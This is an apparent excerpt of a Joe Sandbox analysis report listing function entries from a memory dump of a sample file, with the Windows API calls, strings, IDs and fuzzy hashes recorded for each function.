                                                                                                                • Instruction ID: 083936d2836dcecae44056975693cd88195094475a35cfdcd7535fb945d3d6e0
                                                                                                                • Opcode Fuzzy Hash: 5d69716f1cc4c901ec2b65067e48e22f7f5c51bce25e8d28ce1ae8bf758f548d
                                                                                                                • Instruction Fuzzy Hash: 52419330040140AFDB215F68DC89BB93B66EB2A731F1482A6FDA58E1E7D7348C42D7B5
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                                                                                                • String ID:
                                                                                                                • API String ID: 136442275-0
                                                                                                                • Opcode ID: b4431866fc04a935be87a3416b71c1ccafaf3fe5dc822de4f75f88e8b77a4a6b
                                                                                                                • Instruction ID: e70bcff66498411cc0efac89fd787d635b854e3b3d8ea1a3fd01c49a6295b71f
                                                                                                                • Opcode Fuzzy Hash: b4431866fc04a935be87a3416b71c1ccafaf3fe5dc822de4f75f88e8b77a4a6b
                                                                                                                • Instruction Fuzzy Hash: 1D414F7684511CAECF65DB95CC95DCB73BCEB44300F0041E7B689A2151EB34ABE98F68
                                                                                                                APIs
                                                                                                                • CharLowerBuffW.USER32(0052DC00,0052DC00,0052DC00), ref: 004DD7CE
                                                                                                                • GetDriveTypeW.KERNEL32(?,00543A70,00000061), ref: 004DD898
                                                                                                                • _wcscpy.LIBCMT ref: 004DD8C2
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: BuffCharDriveLowerType_wcscpy
                                                                                                                • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                                                • API String ID: 2820617543-1000479233
                                                                                                                • Opcode ID: a916af1ce38b195741be60626f77177d6148362bf38caf4fa409a224f6edd8f5
                                                                                                                • Instruction ID: 692914831592777b99442c6b09a75fd2f99d3c81277939564378a94277a687c5
                                                                                                                • Opcode Fuzzy Hash: a916af1ce38b195741be60626f77177d6148362bf38caf4fa409a224f6edd8f5
                                                                                                                • Instruction Fuzzy Hash: 81519231544200AFC700FF15D8A1AABBBA5FF95318F10892FF4AA573A2DB35DD05DA4A
                                                                                                                APIs
                                                                                                                • __swprintf.LIBCMT ref: 004993AB
                                                                                                                • __itow.LIBCMT ref: 004993DF
                                                                                                                  • Part of subcall function 004B1557: _xtow@16.LIBCMT ref: 004B1578
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __itow__swprintf_xtow@16
                                                                                                                • String ID: %.15g$0x%p$False$True
                                                                                                                • API String ID: 1502193981-2263619337
                                                                                                                • Opcode ID: aa3edf38982e12fd8677b26187f471e43f94483582ab3b380b1bf62a135191f6
                                                                                                                • Instruction ID: e1b29bb25f546a658b8768151e689b45dd313ec91d6cf229ac23b24e246408d8
                                                                                                                • Opcode Fuzzy Hash: aa3edf38982e12fd8677b26187f471e43f94483582ab3b380b1bf62a135191f6
                                                                                                                • Instruction Fuzzy Hash: 4441E371500204AFEF249F69D942EAABBE8BB48304F20447FE54AD71D1EA359D42CB65
                                                                                                                APIs
                                                                                                                • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 004FA259
                                                                                                                • CreateCompatibleDC.GDI32(00000000), ref: 004FA260
                                                                                                                • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 004FA273
                                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 004FA27B
                                                                                                                • GetPixel.GDI32(00000000,00000000,00000000), ref: 004FA286
                                                                                                                • DeleteDC.GDI32(00000000), ref: 004FA28F
                                                                                                                • GetWindowLongW.USER32(?,000000EC), ref: 004FA299
                                                                                                                • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 004FA2AD
                                                                                                                • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 004FA2B9
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                                                                • String ID: static
                                                                                                                • API String ID: 2559357485-2160076837
                                                                                                                • Opcode ID: 770e28119eb4455babcc8be61aec1e42b5be69fa584280469714386edda2fb27
                                                                                                                • Instruction ID: 1ee35929ac34adbd3bc830f4722b062bdac1ad17750ba3f8d5b02b63a2ea4d50
                                                                                                                • Opcode Fuzzy Hash: 770e28119eb4455babcc8be61aec1e42b5be69fa584280469714386edda2fb27
                                                                                                                • Instruction Fuzzy Hash: 32318F71200218BBDF119FA4DC49FEB3B79FF19364F110215FA19A62A0C739D825EB69
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _wcscpy$CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                                                                                                                • String ID: 0.0.0.0
                                                                                                                • API String ID: 2620052-3771769585
                                                                                                                • Opcode ID: f323f8c1496d6b69d4074fb378367ce131bf6c92450ec8a6d199be65b59eeec5
                                                                                                                • Instruction ID: ca9ffef7cb9b11049dfcf5ce2faf5fcc73f4c247048d4f6255cef8bee735360f
                                                                                                                • Opcode Fuzzy Hash: f323f8c1496d6b69d4074fb378367ce131bf6c92450ec8a6d199be65b59eeec5
                                                                                                                • Instruction Fuzzy Hash: 37112731504114ABDB24AB61EC49EDB77BCEF10714F01406FF005A2281EF789A858B68
                                                                                                                APIs
                                                                                                                • _memset.LIBCMT ref: 004B5047
                                                                                                                  • Part of subcall function 004B7C0E: __getptd_noexit.LIBCMT ref: 004B7C0E
                                                                                                                • __gmtime64_s.LIBCMT ref: 004B50E0
                                                                                                                • __gmtime64_s.LIBCMT ref: 004B5116
                                                                                                                • __gmtime64_s.LIBCMT ref: 004B5133
                                                                                                                • __allrem.LIBCMT ref: 004B5189
                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004B51A5
                                                                                                                • __allrem.LIBCMT ref: 004B51BC
                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004B51DA
                                                                                                                • __allrem.LIBCMT ref: 004B51F1
                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004B520F
                                                                                                                • __invoke_watson.LIBCMT ref: 004B5280
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                                                                • String ID:
                                                                                                                • API String ID: 384356119-0
                                                                                                                • Opcode ID: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
                                                                                                                • Instruction ID: 8ccd16154d55300ad27b1acfdb04a3967c74b48e05ae0e7f4ff40f1cebd624c3
                                                                                                                • Opcode Fuzzy Hash: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
                                                                                                                • Instruction Fuzzy Hash: 0A71D8B5A01B16ABD714AE79CC41BDBF3A8AF05768F14412FF510D6381E778D9408BE8
                                                                                                                APIs
                                                                                                                • _memset.LIBCMT ref: 004D4DF8
                                                                                                                • GetMenuItemInfoW.USER32(00551708,000000FF,00000000,00000030), ref: 004D4E59
                                                                                                                • SetMenuItemInfoW.USER32(00551708,00000004,00000000,00000030), ref: 004D4E8F
                                                                                                                • Sleep.KERNEL32(000001F4), ref: 004D4EA1
                                                                                                                • GetMenuItemCount.USER32(?), ref: 004D4EE5
                                                                                                                • GetMenuItemID.USER32(?,00000000), ref: 004D4F01
                                                                                                                • GetMenuItemID.USER32(?,-00000001), ref: 004D4F2B
                                                                                                                • GetMenuItemID.USER32(?,?), ref: 004D4F70
                                                                                                                • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 004D4FB6
                                                                                                                • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 004D4FCA
                                                                                                                • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 004D4FEB
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                                                                                • String ID:
                                                                                                                • API String ID: 4176008265-0
                                                                                                                • Opcode ID: 52f7dcb4d3e11e6c92ad76d32c35c25f341de656ea12d57814c7ae81fbd0b598
                                                                                                                • Instruction ID: 7a758bd60b8b6f08c487b2efdec8e8a866df10468f6c82fde2845ddcc5f85c33
                                                                                                                • Opcode Fuzzy Hash: 52f7dcb4d3e11e6c92ad76d32c35c25f341de656ea12d57814c7ae81fbd0b598
                                                                                                                • Instruction Fuzzy Hash: 02619F71900259AFDB11CFA4D8A8AAF7BB9FB85308F14405FF441A73A1D738AD09DB25
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 004F9C98
                                                                                                                • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 004F9C9B
                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 004F9CBF
                                                                                                                • _memset.LIBCMT ref: 004F9CD0
                                                                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004F9CE2
                                                                                                                • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 004F9D5A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$LongWindow_memset
                                                                                                                • String ID:
                                                                                                                • API String ID: 830647256-0
                                                                                                                • Opcode ID: 6cdca0ed9698b61156e4289c01afb7de19db9e761962f6d14a14ba774dc44655
                                                                                                                • Instruction ID: 7f4ae34a2b93e1915ce38ce26b2d66f10605e10bd6490799219ee2d007ced03b
                                                                                                                • Opcode Fuzzy Hash: 6cdca0ed9698b61156e4289c01afb7de19db9e761962f6d14a14ba774dc44655
                                                                                                                • Instruction Fuzzy Hash: EA618B75900208AFDB10DFA8CC81FFE7BB8EB09704F14415AFA05A7291C774AD46DB64
                                                                                                                APIs
                                                                                                                • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,?), ref: 004C94FE
                                                                                                                • SafeArrayAllocData.OLEAUT32(?), ref: 004C9549
                                                                                                                • VariantInit.OLEAUT32(?), ref: 004C955B
                                                                                                                • SafeArrayAccessData.OLEAUT32(?,?), ref: 004C957B
                                                                                                                • VariantCopy.OLEAUT32(?,?), ref: 004C95BE
                                                                                                                • SafeArrayUnaccessData.OLEAUT32(?), ref: 004C95D2
                                                                                                                • VariantClear.OLEAUT32(?), ref: 004C95E7
                                                                                                                • SafeArrayDestroyData.OLEAUT32(?), ref: 004C95F4
                                                                                                                • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 004C95FD
                                                                                                                • VariantClear.OLEAUT32(?), ref: 004C960F
                                                                                                                • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 004C961A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                                                • String ID:
                                                                                                                • API String ID: 2706829360-0
                                                                                                                • Opcode ID: bd6ee598fe7294a2abe31374195b840bf75c7489dfcae7f2237d4c2015b3b385
                                                                                                                • Instruction ID: 282899601bfe053592c08376154e8bc927548dc7654c12edd8ccfa782ca36d67
                                                                                                                • Opcode Fuzzy Hash: bd6ee598fe7294a2abe31374195b840bf75c7489dfcae7f2237d4c2015b3b385
                                                                                                                • Instruction Fuzzy Hash: 9E413235A00219BFCF01DFA4D848DDEBB79FF18354F00806AE501A7251DBB5AA45DBA5
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Variant$ClearInit$_memset
                                                                                                                • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop$_NewEnum$get__NewEnum
                                                                                                                • API String ID: 2862541840-1765764032
                                                                                                                • Opcode ID: a1d653fa1f7820996195763dbe031ca62c50d616c0defa802126a9a04e3211e5
                                                                                                                • Instruction ID: eaea461e68ffc74df774e0655278bc9172103e762815e02e30922047b88316a3
                                                                                                                • Opcode Fuzzy Hash: a1d653fa1f7820996195763dbe031ca62c50d616c0defa802126a9a04e3211e5
                                                                                                                • Instruction Fuzzy Hash: EA91AD71A00249ABDF20CFA6CC44FAFBBB8EF85715F10815AF505AB280D7789945CBA4
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0049936C: __swprintf.LIBCMT ref: 004993AB
                                                                                                                  • Part of subcall function 0049936C: __itow.LIBCMT ref: 004993DF
                                                                                                                • CoInitialize.OLE32 ref: 004EADF6
                                                                                                                • CoUninitialize.COMBASE ref: 004EAE01
                                                                                                                • CoCreateInstance.COMBASE(?,00000000,00000017,0051D8FC,?), ref: 004EAE61
                                                                                                                • IIDFromString.COMBASE(?,?), ref: 004EAED4
                                                                                                                • VariantInit.OLEAUT32(?), ref: 004EAF6E
                                                                                                                • VariantClear.OLEAUT32(?), ref: 004EAFCF
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                                                                                • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                                                • API String ID: 834269672-1287834457
                                                                                                                • Opcode ID: 005389e59ad23ee803bd2aeaa55a78924d059de6917aadf19a971995bae212d1
                                                                                                                • Instruction ID: ce6c8e44a75250e0314baa4973f021504d04680f1368b74adbb8934c963bd6e7
                                                                                                                • Opcode Fuzzy Hash: 005389e59ad23ee803bd2aeaa55a78924d059de6917aadf19a971995bae212d1
                                                                                                                • Instruction Fuzzy Hash: 0961AD70208341AFC710DF5AC849B6BBBE8AF48709F00441EF9859B291C778ED59CB9B
                                                                                                                APIs
                                                                                                                • WSAStartup.WS2_32(00000101,?), ref: 004E8168
                                                                                                                • inet_addr.WS2_32(?), ref: 004E81AD
                                                                                                                • gethostbyname.WS2_32(?), ref: 004E81B9
                                                                                                                • IcmpCreateFile.IPHLPAPI ref: 004E81C7
                                                                                                                • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 004E8237
                                                                                                                • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 004E824D
                                                                                                                • IcmpCloseHandle.IPHLPAPI(00000000), ref: 004E82C2
                                                                                                                • WSACleanup.WS2_32 ref: 004E82C8
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                                                • String ID: Ping
                                                                                                                • API String ID: 1028309954-2246546115
                                                                                                                • Opcode ID: fdd9e8e046da49150abe260460ad3972d915910c1b54f2a980511b2653a0c210
                                                                                                                • Instruction ID: 1c9f53a74fc8169db5705072518b8753289a4e2b071fd519ec04d387c03b712e
                                                                                                                • Opcode Fuzzy Hash: fdd9e8e046da49150abe260460ad3972d915910c1b54f2a980511b2653a0c210
                                                                                                                • Instruction Fuzzy Hash: 3151C131604700AFDB109F26CC45B6ABBE4EF59315F04886EFA599B3E0DB38E805DB46
                                                                                                                APIs
                                                                                                                • SetErrorMode.KERNEL32(00000001), ref: 004DE396
                                                                                                                • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 004DE40C
                                                                                                                • GetLastError.KERNEL32 ref: 004DE416
                                                                                                                • SetErrorMode.KERNEL32(00000000,READY), ref: 004DE483
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
